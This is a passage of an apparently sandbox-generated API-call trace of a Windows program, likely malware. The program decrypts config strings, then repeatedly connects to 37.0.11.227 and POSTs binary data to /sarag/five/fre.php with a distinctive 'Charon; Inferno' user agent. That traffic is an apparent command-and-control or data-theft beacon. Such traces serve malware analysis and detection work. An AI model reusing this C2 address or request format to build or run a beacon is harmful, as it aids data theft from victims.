(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.167] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.167] GetProcessHeap () returned 0x690000 [0310.167] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0310.167] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0310.167] GetProcessHeap () returned 0x690000 [0310.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0310.167] GetProcessHeap () returned 0x690000 [0310.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0310.168] GetProcessHeap () returned 0x690000 [0310.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0310.168] GetProcessHeap () returned 0x690000 [0310.168] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0310.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.171] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.175] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0310.179] GetProcessHeap () returned 0x690000 [0310.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0310.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.182] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0310.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.182] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.183] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.183] GetProcessHeap () returned 0x690000 [0310.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0310.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.184] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0310.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.185] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0310.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.186] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0310.186] GetProcessHeap () returned 0x690000 [0310.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0310.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.187] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0310.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.188] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0310.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.188] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0310.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.189] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0310.189] GetProcessHeap () returned 0x690000 [0310.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0310.189] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0310.189] GetProcessHeap () returned 0x690000 [0310.190] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0310.190] socket (af=2, type=1, protocol=6) returned 0xa64 [0310.190] connect (s=0xa64, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0310.216] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0310.216] GetProcessHeap () returned 0x690000 [0310.216] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0310.216] GetProcessHeap () returned 0x690000 [0310.216] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0310.217] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0310.217] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0310.218] GetProcessHeap () returned 0x690000 [0310.218] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0310.218] GetProcessHeap () returned 0x690000 [0310.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0310.218] GetProcessHeap () returned 0x690000 [0310.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0310.219] GetProcessHeap () returned 0x690000 [0310.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0310.219] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0310.220] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0310.220] GetProcessHeap () returned 0x690000 [0310.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0310.220] GetProcessHeap () returned 0x690000 [0310.220] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0310.220] send (s=0xa64, buf=0x6ad508*, len=242, flags=0) returned 242 [0310.221] send (s=0xa64, buf=0x6aba40*, len=159, flags=0) returned 159 [0310.221] GetProcessHeap () returned 0x690000 [0310.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0310.221] recv (in: s=0xa64, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0310.292] GetProcessHeap () returned 0x690000 [0310.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0310.293] GetProcessHeap () returned 0x690000 [0310.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0310.293] GetProcessHeap () returned 0x690000 [0310.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0310.294] GetProcessHeap () returned 0x690000 [0310.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0310.295] closesocket (s=0xa64) returned 0 [0310.295] GetProcessHeap () returned 0x690000 [0310.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0310.295] GetProcessHeap () returned 0x690000 [0310.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0310.296] GetProcessHeap () returned 0x690000 [0310.296] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0310.296] GetProcessHeap () returned 0x690000 [0310.296] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0310.297] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x151c) returned 0xa64 [0310.298] Sleep (dwMilliseconds=0xea60) [0310.299] GetProcessHeap () returned 0x690000 [0310.299] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0310.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.301] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.306] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0310.311] GetProcessHeap () returned 0x690000 [0310.311] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0310.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.312] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0310.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.313] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.313] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.313] GetProcessHeap () returned 0x690000 [0310.314] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0310.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.315] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0310.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.315] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0310.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.316] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0310.316] GetProcessHeap () returned 0x690000 [0310.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0310.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.317] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.318] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.319] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.320] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.320] GetProcessHeap () returned 0x690000 [0310.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0310.320] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0310.320] GetProcessHeap () returned 0x690000 [0310.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0310.321] GetProcessHeap () returned 0x690000 [0310.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0310.321] GetProcessHeap () returned 0x690000 [0310.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0310.322] GetProcessHeap () returned 0x690000 [0310.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0310.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.323] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.326] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0310.331] GetProcessHeap () returned 0x690000 [0310.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0310.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.332] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0310.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.333] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.334] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.334] GetProcessHeap () returned 0x690000 [0310.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0310.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.335] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0310.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.336] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0310.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.336] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0310.336] GetProcessHeap () returned 0x690000 [0310.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0310.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.337] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0310.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.338] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0310.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.339] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0310.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.340] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0310.340] GetProcessHeap () returned 0x690000 [0310.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0310.340] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0310.340] GetProcessHeap () returned 0x690000 [0310.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0310.340] socket (af=2, type=1, protocol=6) returned 0xa68 [0310.340] connect (s=0xa68, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0310.365] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0310.365] GetProcessHeap () returned 0x690000 [0310.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0310.365] GetProcessHeap () returned 0x690000 [0310.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0310.365] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0310.366] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0310.366] GetProcessHeap () returned 0x690000 [0310.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0310.366] GetProcessHeap () returned 0x690000 [0310.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0310.367] GetProcessHeap () returned 0x690000 [0310.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0310.367] GetProcessHeap () returned 0x690000 [0310.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0310.367] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0310.368] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0310.368] GetProcessHeap () returned 0x690000 [0310.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0310.368] GetProcessHeap () returned 0x690000 [0310.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0310.368] send (s=0xa68, buf=0x6ad508*, len=242, flags=0) returned 242 [0310.369] send (s=0xa68, buf=0x6aba40*, len=159, flags=0) returned 159 [0310.369] GetProcessHeap () returned 0x690000 [0310.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0310.369] recv (in: s=0xa68, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0310.451] GetProcessHeap () returned 0x690000 [0310.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0310.452] GetProcessHeap () returned 0x690000 [0310.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0310.452] GetProcessHeap () returned 0x690000 [0310.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0310.453] GetProcessHeap () returned 0x690000 [0310.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0310.453] closesocket (s=0xa68) returned 0 [0310.453] GetProcessHeap () returned 0x690000 [0310.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0310.454] GetProcessHeap () returned 0x690000 [0310.454] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0310.454] GetProcessHeap () returned 0x690000 [0310.454] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0310.454] GetProcessHeap () returned 0x690000 [0310.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0310.455] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16a4) returned 0xa68 [0310.456] Sleep (dwMilliseconds=0xea60) [0310.458] GetProcessHeap () returned 0x690000 [0310.458] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0310.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.459] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.464] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0310.469] GetProcessHeap () returned 0x690000 [0310.469] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0310.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.469] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0310.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.470] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.471] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.471] GetProcessHeap () returned 0x690000 [0310.471] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0310.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.479] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0310.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.502] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0310.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.504] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0310.505] GetProcessHeap () returned 0x690000 [0310.505] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0310.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.506] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.507] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.508] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.509] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.509] GetProcessHeap () returned 0x690000 [0310.509] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0310.509] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0310.510] GetProcessHeap () returned 0x690000 [0310.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0310.511] GetProcessHeap () returned 0x690000 